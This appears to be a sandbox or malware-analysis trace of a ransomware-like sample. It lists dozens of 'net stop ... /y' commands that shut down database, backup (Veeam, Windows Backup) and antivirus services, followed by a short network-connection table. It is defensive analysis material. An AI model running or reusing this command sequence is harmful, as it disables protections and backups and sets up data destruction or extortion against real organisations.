C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

Country Destination Domain Proto
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
DE 67.24.27.254:80 tcp
DE 67.24.27.254:80 tcp

Files

N/A